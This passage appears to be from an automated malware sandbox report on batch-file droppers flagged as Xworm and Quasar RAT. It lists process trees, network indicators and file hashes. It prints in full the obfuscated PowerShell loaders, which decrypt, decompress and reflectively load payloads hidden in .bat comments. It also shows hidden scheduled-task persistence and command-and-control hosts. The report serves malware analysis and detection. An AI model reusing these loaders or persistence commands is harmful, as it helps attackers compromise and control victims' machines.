$TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_490_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_490.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_490.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_490.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_490.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_490.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | express-divorce.gl.at.ply.gg | udp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.19:24820 | traffic-collins.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
| US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c3pqlkgi.ijq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4116-8-0x0000020D78F20000-0x0000020D78F42000-memory.dmp
memory/4116-9-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/4116-10-0x0000020D79190000-0x0000020D791A0000-memory.dmp
memory/4116-11-0x0000020D79190000-0x0000020D791A0000-memory.dmp
memory/4116-12-0x0000020D79190000-0x0000020D791A0000-memory.dmp
memory/4116-13-0x0000020D78F10000-0x0000020D78F18000-memory.dmp
memory/4116-14-0x0000020D793A0000-0x0000020D794E0000-memory.dmp
memory/4408-16-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/4408-17-0x000001CD51E50000-0x000001CD51E60000-memory.dmp
memory/4408-26-0x000001CD51E50000-0x000001CD51E60000-memory.dmp
memory/4408-29-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb15ee5741b379245ca8549cb0d4ecf8 |
| SHA1 | 3555273945abda3402674aea7a4bff65eb71a783 |
| SHA256 | b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636 |
| SHA512 | 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4 |
C:\Users\Admin\AppData\Roaming\startup_str_824.vbs
| MD5 | 3ffd611ef2d18d243ac564e0f7d62821 |
| SHA1 | dc263be524db27643cd508db6324a6fa84894ac7 |
| SHA256 | b3675ddb7a8616d21671bc2e69dac84890c104c802ba9132a89e0a523a8f1fae |
| SHA512 | 9ea8f1655bc51637279d62b86c0b863d233eb187a28fd1130736fe769327bbb51645046385c7fdc850954b5497f25e1794e947be2fc30464fb8307d579f60dce |
C:\Users\Admin\AppData\Roaming\startup_str_824.bat
| MD5 | 948386c98184781df692e5f11ff558f7 |
| SHA1 | e8619faf83446ea78e456920834579bbf71aea20 |
| SHA256 | 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f |
| SHA512 | 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba |
memory/3932-38-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/3932-39-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp
memory/3932-50-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp
memory/4116-49-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/3932-54-0x000001CE33570000-0x000001CE33894000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat
| MD5 | 795363cfbf5d3fca47edc4cbc247a1c0 |
| SHA1 | 9374d05486b0b62977825d07f748fa03cca3c864 |
| SHA256 | 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6 |
| SHA512 | c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94 |
memory/4116-57-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/3932-58-0x000001CE33AB0000-0x000001CE33B00000-memory.dmp
memory/3932-59-0x000001CE33BC0000-0x000001CE33C72000-memory.dmp
memory/3932-60-0x000001CE349B0000-0x000001CE34B72000-memory.dmp
memory/3728-61-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/3728-63-0x0000017A181C0000-0x0000017A181D0000-memory.dmp
memory/3728-62-0x0000017A181C0000-0x0000017A181D0000-memory.dmp
memory/3728-72-0x0000017A181C0000-0x0000017A181D0000-memory.dmp
memory/3728-73-0x0000017A322A0000-0x0000017A322A8000-memory.dmp
memory/3728-74-0x0000017A32540000-0x0000017A3254C000-memory.dmp
memory/236-84-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/236-85-0x000001853E1C0000-0x000001853E1D0000-memory.dmp
memory/236-86-0x000001853E1C0000-0x000001853E1D0000-memory.dmp
memory/236-87-0x000001853E1C0000-0x000001853E1D0000-memory.dmp
memory/236-88-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\startup_str_490.vbs
| MD5 | 73e3c7287bdc5f01d99975b430648c50 |
| SHA1 | cc5c980a06300d17deb79d2ba171901fe572d19d |
| SHA256 | 90d9885fc42a71dd01bb1075c27c17440fd7c5477be9bcf0fdb11ab31b0129cc |
| SHA512 | 12f93c750af16e139b82dfa4a8026f51b79686e8c96a32df84e73f0db9184a88fdf4d6f278d79e055c05ba9e804b96a44bae28c9072ccf034d9f7be05f40a4c8 |
memory/4120-95-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/4120-96-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp
memory/4120-105-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp
memory/4120-107-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp
memory/4120-108-0x0000023DE8050000-0x0000023DE805E000-memory.dmp
memory/3728-109-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/3932-110-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/3932-111-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp
memory/3932-112-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp
memory/3932-113-0x000001CE1ADB0000-0x000001CE1ADC0000-memory.dmp
memory/4120-114-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp
memory/4120-115-0x00007FF8C6C30000-0x00007FF8C76F2000-memory.dmp
memory/4120-116-0x0000023DE80E0000-0x0000023DE80F0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-13 17:59
Reported
2024-04-13 18:01
Platform
win10-20240404-en
Max time kernel
38s
Max time network
52s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_306.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_306.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_306.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_306.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_991_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_991.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4396" "2636" "2296" "2632" "0" "0" "2640" "0" "0" "0" "0" "0"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_991.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_991.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_991.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_991.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | express-divorce.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | traffic-collins.gl.at.ply.gg | udp |
| US | 147.185.221.19:24820 | traffic-collins.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
Files
memory/4112-4-0x000001C425A40000-0x000001C425A62000-memory.dmp
memory/4112-5-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/4112-6-0x000001C425930000-0x000001C425940000-memory.dmp
memory/4112-7-0x000001C425930000-0x000001C425940000-memory.dmp
memory/4112-10-0x000001C425BF0000-0x000001C425C66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qikc30dv.m3g.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4112-21-0x000001C425930000-0x000001C425940000-memory.dmp
memory/4112-26-0x000001C425BD0000-0x000001C425BD8000-memory.dmp
memory/4112-27-0x000001C425C70000-0x000001C425DB0000-memory.dmp
memory/356-37-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/356-38-0x00000172CCC70000-0x00000172CCC80000-memory.dmp
memory/356-39-0x00000172CCC70000-0x00000172CCC80000-memory.dmp
memory/356-54-0x00000172CCC70000-0x00000172CCC80000-memory.dmp
memory/356-72-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bb4d79c418d1df838dc1dfb6db57501d |
| SHA1 | 903525e7a2dac8f931e1ba2f87e1bb1dea08a867 |
| SHA256 | f1bf5360d8ede0205136292027ecff131b04d6cfd7bbb9ab146472de948c771f |
| SHA512 | 43b3c6ae5facdd7c1d59ff23b5681919252900a7c9cf16270ae51e98372648d1b67323dd1f86745266acc751c0bd8f17e7400c903a02c8f7ca5c74e450c25eee |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Roaming\startup_str_306.vbs
| MD5 | dc4450363ab10c9f55eaf2d492874449 |
| SHA1 | e24646e2935bac1e28d52a61d6d66137c9456bdc |
| SHA256 | 66289b23354835c32537852ad0db8b3a1577e6ceb302260b9559fa18954d894e |
| SHA512 | 679080f157f9a10aa36aa0db4b005aaed74bdb6d2fdcbcfd37f236c42be5a4b2add257757bc6012ce0f77d16e7503bfb0bc57adf6714cc84d227cc5444179619 |
C:\Users\Admin\AppData\Roaming\startup_str_306.bat
| MD5 | 948386c98184781df692e5f11ff558f7 |
| SHA1 | e8619faf83446ea78e456920834579bbf71aea20 |
| SHA256 | 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f |
| SHA512 | 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba |
memory/4396-86-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/4396-90-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp
memory/4396-91-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp
memory/4396-105-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp
memory/4112-111-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/4396-117-0x0000017EC89D0000-0x0000017EC8CF4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat
| MD5 | 795363cfbf5d3fca47edc4cbc247a1c0 |
